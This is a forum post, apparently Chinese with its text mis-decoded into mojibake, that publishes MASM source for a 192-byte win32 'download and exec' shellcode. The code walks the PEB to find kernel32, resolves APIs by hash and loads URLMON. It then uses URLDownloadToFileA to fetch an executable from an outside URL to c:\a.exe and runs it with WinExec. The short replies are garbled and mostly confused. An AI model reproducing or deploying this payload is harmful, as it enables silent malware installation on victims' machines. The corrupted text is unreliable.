win32 Tiny Download and Exec Shellcode 192 bytes

Â¥Ö÷
win32 Tiny Download and Exec Shellcode 192 bytes
²»ÊÇÀÏÓÐÈËÂôÏÂÔØÕßµÄÂð£¿ÆäʵËûÃÇÂôµÄ¶«Î÷δ±ØÊÇ×Ô¼ºÐ´µÄ¡£Ö»²»¹ýÊÇ´ó¼Ò×Ô¼ºÃ»ÓÐ×ÐϸÑо¿¶øÒÑ¡£·¢Ò»¸ö¾ÞСµÄºÃ¶«Î÷£¬ÖÁÉÙÎÒÏÖÔÚ»¹Ã»Óз¢ÏÖ¹úÄÚÄÄÀïÓеġ£07Äê6Ô·ݾͳöÀ´ÁË¡£ÎÒÖ®ËùÒÔ·¢³öÀ´ÊÇÒòΪËüɱÉËÁ¦´ó£¬ºÜ¾­µäºÜÓÐÓ㬾ӼÒÂÃÐÐɱÈË·Å»ðµÄºÃ¹¤¾ß°¡¡£²»ËµÁË£¬¿´´úÂë¡£ÓÐÐËȤµÄ×Ô¼º±àÒëһϡ£
;Tiny Download&&Exec ShellCode codz czy
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none

include     c:\masm32\include\windows.inc
include     c:\masm32\include\kernel32.inc
includelib  c:\masm32\lib\kernel32.lib
include     c:\masm32\include\user32.inc
includelib  c:\masm32\lib\user32.lib


.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer    db 2046 dup(0)
downshell    db 'down exploit',0
.code
start:
    invoke    MessageBoxA,0,offset downshell,offset downshell,1
    invoke    RtlMoveMemory,offset shellcodebuffer,00401040H,256
    mov    eax,offset shellcodebuffer
    jmp    eax
    somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;áëà ÃæµÄ´úÂëÊÇ¡ãá®Ã¡±ÃšÂ´ÃºÃ‚ë¶ÎèCà µÄshellcodeá¯Ã†Â¶Â¯ÃŠÃ½Â¾Ã ¶ÎèCà èC´à à £¬Ä£ÄâÕæʵµÄshellcodeèC´à à »¡¤Â¾Â³    
@@shellcodebegin:       
    call    @@beginaddr
@@beginaddr:
    PUSH 03H      ;á¯ÂªÂµÃ¡¤Ã¡°ÃƒÂµÃ„APIº¯Êý¸öÊý
    jmp    @@realshellcode          
myExitProcess     dd 073e2d87eh  
myWinExec         dd 00e8afe98h    
myLoadLibraryA    dd 0ec0e4e8eh
dll               db 'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 'c:\a.exe',0
url               db '[URL=http://www.ph4nt0m.org/a.exe][U][COLOR=#0000ff]http://www.ph4nt0m.org/a.exe[/COLOR][/U][/URL]',0



@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi+4
;µÃµ½kernel32.dll»ùµØèC¡¤
db  67h,64h,0A1h,30h,00h
    mov eax, [eax+0cH]
    mov esi, [eax+1cH]
    lodsd
    mov ebp, [eax+08H]          ;EBPèCà ´æ¡¤Ã¡­kernel32.dllµÄ»ùµØèC¡¤
;´¦Àíµ¼³ö¡Àí
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP+3Ch]
MOV       ESI,[EBP+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]
MOV       EBX,[ESI+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ;2
cmp cl,'c'      ;3
jz @@downfile   ;2
PUSH EDI
CALL EAX        ;2
xchg eax,ebp
scasd
scasd
push 01         ;2µÚ¶þ¸öDLLµÄº¯Êý¸öÊý
jmp @@next3     ;2
                ;áªÃœÂ¼Ã†17

        
@@downfile:

    push    edx  ;0
    push    edx  ;0
    push    edi  ;file=c:\a.exe
    lea     ecx, dword ptr [edi+9h]
    push    ecx  ;url
    push    edx  ;0
    call    eax  ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0
   
   
    push 1 ;FOR TEST
    push edi
    call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1
   
    call dword ptr [edi-18H] ;Exitprocess

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
    invoke ExitProcess,0
end start
1Â¥
ÄãÊÇ×Öĸר¼ÒÂð£¿
2Â¥
[FACE=¿¬Ìå_GB2312 ][COLOR=#dddd22][SIZE=5]¿´À´ÔÛÃÇÏܵÂ×ÚÇ׸ú¡°»ùµØ×éÖ¯±¾À­¶¡¡±½ÓÉÏÍ·ÁËÓÐʲô»õ?չʾÏÂÈÃ×ÚÇ×ÃǶ¼¼ûʶһÏÂ,¿ª¿ªÑÛ½ç.[/SIZE][/COLOR][/FACE]
3Â¥
¿´²»Ã÷¡£

Óдý½âÂë
4Â¥
ÎÒÔ½¿´Ô½ÉµÁË,¸Ã²»»áÊDz¡¶¾³ÌÐò°É,Õâ¸ö±à³ÌÕßҲ̫»á¶à¹úÓïÑÔÁË
5Â¥
ʲô¶«¶«£¬²»¶®[EM21][EM21][EM10][EM10]

µçÄÔ°æ Page created in 0.0469 seconds width 4 queries.